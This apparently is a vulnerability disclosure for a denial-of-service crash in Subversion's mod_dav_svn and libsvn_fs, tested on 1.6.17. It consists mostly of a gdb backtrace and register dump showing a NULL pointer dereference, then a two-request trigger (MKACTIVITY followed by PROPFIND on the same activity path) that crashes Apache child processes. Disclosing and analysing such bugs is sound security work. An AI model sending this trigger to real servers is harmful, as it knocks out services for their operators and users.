#########################
# Subversion MKACTIVITY #
#########################
#
# Authors:
#
# 22733db72ab3ed94b5f8a1ffcde850251fe6f466
# c8e74ebd8392fda4788179f9a02bb49337638e7b
# AKAT-1
#
#######################################

# libsvn_fs's svn_fs_file_length() fun
# tested on 1.6.17 and few others

(gdb) where
#0  0x00007f2595db9d60 in svn_fs_file_length () from /usr/lib/x86_64-linux-gnu/libsvn_fs-1.so.1
#1  0x00007f25961f2d8b in ?? () from /usr/lib/apache2/modules/mod_dav_svn.so
#2  0x00007f25961f37c5 in dav_svn__insert_all_liveprops () from /usr/lib/apache2/modules/mod_dav_svn.so
#3  0x00007f259682b37a in dav_run_insert_all_liveprops (r=0x7f2590df10a0, resource=0x7fff6e97e1a8, what=DAV_PROP_INSERT_VALUE, phdr=0x7fff6e97dff0) at mod_dav.c:4889
#4  0x00007f259682bc55 in dav_get_allprops (propdb=0x7f258d0db3d0, what=DAV_PROP_INSERT_VALUE) at props.c:655
#5  0x00007f2596824f5e in dav_propfind_walker (wres=0x7fff6e97e188, calltype=<optimized out>) at mod_dav.c:1949
#6  0x00007f25961fc6d1 in ?? () from /usr/lib/apache2/modules/mod_dav_svn.so
#7  0x00007f25961fcb6d in ?? () from /usr/lib/apache2/modules/mod_dav_svn.so
#8  0x00007f2596829bda in dav_method_propfind (r=0x7f2590df10a0) at mod_dav.c:2081
#9  dav_handler (r=0x7f2590df10a0) at mod_dav.c:4681
#10 dav_handler (r=0x7f2590df10a0) at mod_dav.c:4587
#11 0x00007f259e568b50 in ap_run_handler (r=0x7f2590df10a0) at config.c:159
#12 0x00007f259e568f9b in ap_invoke_handler (r=r@entry=0x7f2590df10a0) at config.c:377
#13 0x00007f259e579078 in ap_process_request (r=r@entry=0x7f2590df10a0) at http_request.c:282
#14 0x00007f259e575f38 in ap_process_http_connection (c=0x7f25917c0290) at http_core.c:190
#15 0x00007f259e56f510 in ap_run_process_connection (c=0x7f25917c0290) at connection.c:43
#16 0x00007f259e56f8f8 in ap_process_connection (c=c@entry=0x7f25917c0290, csd=<optimized out>) at connection.c:190
#17 0x00007f259e57dc2e in child_main (child_num_arg=child_num_arg@entry=6) at prefork.c:667
#18 0x00007f259e57e382 in make_child (slot=6, s=0x7f259e4d6818) at prefork.c:768
#19 make_child (s=0x7f259e4d6818, slot=6) at prefork.c:696
#20 0x00007f259e57eee6 in perform_idle_server_maintenance (p=<optimized out>) at prefork.c:903
#21 ap_mpm_run (_pconf=_pconf@entry=0x7f259e515028, plog=<optimized out>, s=s@entry=0x7f259e4d6818) at prefork.c:1107
#22 0x00007f259e553826 in main (argc=3, argv=0x7fff6e97e9b8) at main.c:755
(gdb)
(gdb) i r
rax            0x7fff6e97e1e0   140735048835552
rbx            0x7fff6e97e1a8   140735048835496
rcx            0x7f2590df7028   139799321079848
rdx            0x0      0
rsi            0x0      0
rdi            0x7fff6e97dec8   140735048834760
rbp            0x3      0x3
rsp            0x7fff6e97de78   0x7fff6e97de78
r8             0x7f2596833ee0   139799415701216
r9             0x1      1
r10            0x1      1
r11            0x1      1
r12            0x4e24   20004
r13            0x7f2590e08028   139799321149480
r14            0x7fff6e97dff0   140735048835056
r15            0x7f2590df7028   139799321079848
rip            0x7f2595db9d60   0x7f2595db9d60 <svn_fs_file_length>
eflags         0x246    [ PF ZF IF ]
cs             0x33     51
ss             0x2b     43
ds             0x0      0
es             0x0      0
fs             0x0      0
gs             0x0      0
(gdb) x/i $rip
=> 0x7f2595db9d60 <svn_fs_file_length>: mov    0x30(%rsi),%rax
(gdb) x/x $rsi
0x0:    Cannot access memory at address 0x0


Basically it requires >= 2 requests to crash apache child process (in mod_dav_svn / libsvn_fs).
-- cut --
1. MKACTIVITY /egg/!svn/act/foo HTTP/1.1
2. PROPFIND /egg/!svn/act/foo HTTP/1.1 (sigsegv)
-- cut --
EOF